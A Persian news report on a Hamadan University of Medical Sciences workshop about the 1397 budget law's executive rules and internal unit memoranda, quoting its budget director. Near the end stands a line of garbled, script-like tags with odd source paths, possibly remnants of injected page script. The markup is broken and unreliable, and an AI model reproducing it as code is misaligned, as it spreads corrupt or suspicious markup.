کارگاه آموزشی”ضوابط اجرایی قانون بودجه ۹۷″ و “مبادله تفاهم نامه داخلی” دانشگاه علوم پزشکی همدان برگزار شد.

کارگاه آموزشی ضوابط اجرایی قانون بودجه سال ۹۷ و مبادله تفاهم نامه داخلی واحد های تابعه در سالن همایش های مرکز آموزشی درمانی بعثت همدان با رویکرد بررسی نکات مهم ضوابط اجرایی بودجه سال جاری و تشریح جداول تفاهم نامه داخلی با حضور کارشناسان بودجه، روسای حسابداری و مسئولین امور مالی واحدهای تابعه دانشگاه برگزار شد.

مدیر برنامه ریزی، بودجه و پایش عملکرد دانشگاه با اشاره به اهمیت تبادل تفاهم نامه تاکید کرد: با توجه به مصوبات و تکالیف هیئت امنای دانشگاه و وزارت متبوع، موضوع تفاهم نامه یکی از ارکان مهم ایجاد انضباط مالی در سال جاری می باشد

دکتر فریبرز نیاستی افزود: رعایت و اجرای دقیق مفاد تفاهم نامه مبادله شده در سطح دانشگاه منجر به بهره وری و ایجاد اثربخشی بیشتر در منابع دانشگاه می شود.

وی با تاکید بر اصل انضباط مالی در دانشگاه گفت: در سال جاری تمام واحدهای تابعه دانشگاه توسط تیم های پایش وزارتی در خصوص رعایت مفاد تفاهم نامه مورد ارزیابی و پایش قرار می گیرند.

تفاهم نامه سندی است که تمامی اطلاعات مربوط به واحد های تابعه دانشگاه از جمله منابع انسانی، منابع درآمدی، امور قراردادها، فصول هزینه، سرفصل اعتبارات و نیز سقف اعتباری هر واحد با توجه به پیش بینی میزان منابع و درآمد های اختصاصی به منظور بهینه نمودن و کنترل هزینه ها را شامل می شود.

در پایان مدیر برنامه ریزی، بودجه و پایش عملکرد دانشگاه از همکاری صمیمانه ریاست، مدیر و مسئول روابط عمومی و مسئول تدارکات مرکز آموزشی درمانی بعثت قدردانی نمود

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *